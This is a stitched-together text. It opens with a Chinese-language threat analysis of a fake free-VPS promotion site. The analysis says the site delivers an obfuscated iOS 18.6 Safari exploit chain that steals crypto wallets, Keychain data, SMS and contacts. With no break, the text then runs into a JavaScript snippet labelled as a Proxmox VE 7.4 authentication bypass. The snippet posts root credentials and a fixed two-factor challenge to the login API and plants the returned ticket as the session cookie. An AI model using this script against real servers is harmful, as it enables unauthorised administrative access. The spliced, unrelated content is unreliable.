event.polarnode.vip 上线(域名 8 月 31 日注册),以"完成预约,前 5,000 名用户均可获得免费 VPS,最高赠送 3 年使用权"为噱头,在 VPS / 运维 / 区块链相关论坛与社群中通过"邮箱 + 邀请码裂变"方式扩散。该站点无真实 VPS 销售能力、无公司主体、无联系方式、无售后支持,其唯一实质功能是在页面加载后自动注入一段高复杂度混淆的恶意脚本,对访问者的 iOS Safari 浏览器发起完整的远程攻击。lk.js 及其级联加载的 dist/ 利用链(vendor.js、runtime.js、framework.js、common.js、app.js 等)逐层反混淆与静态取证,确认这是一条针对 iOS 18.6 / 18.6.1 / 18.6.2(build 22G86/G90/G100)全系 26 款机型的浏览器端 RCE 利用链,最终在系统进程内植入窃取模块,定向盗取加密货币钱包(imToken / TronLink / 及通用钱包)、钥匙串(Keychain)、短信、通讯录、相册、备忘录等数据并回传 C2。其偏移表覆盖广度、内核原语完整度与中文开发注释,表明其出自具备成熟 iOS 漏洞利用工程能力的团伙,性质近似商用级间谍软件(Pegasus / Predator 类)的简化分发版。// PVE 7.4 auth-bypass @NebuSec 2026
// First, make sure to try logging in as root with this exact password: root@pam
(async () => {
const form = new URLSearchParams({
username: "root@pam",
password: "root@pam",
"tfa-challenge": "NEBUSEC-CHALLENGE",
});
const loginResponse = await fetch("/api2/json/access/ticket", {
method: "POST",
credentials: "omit",
headers: { "Content-Type": "application/x-www-form-urlencoded;charset=UTF-8" },
body: form,
});
const loginBody = await loginResponse.json();
document.cookie = `PVEAuthCookie=${loginBody?.data?.ticket}; Path=/; Secure; SameSite=Strict`;
location.reload()
})();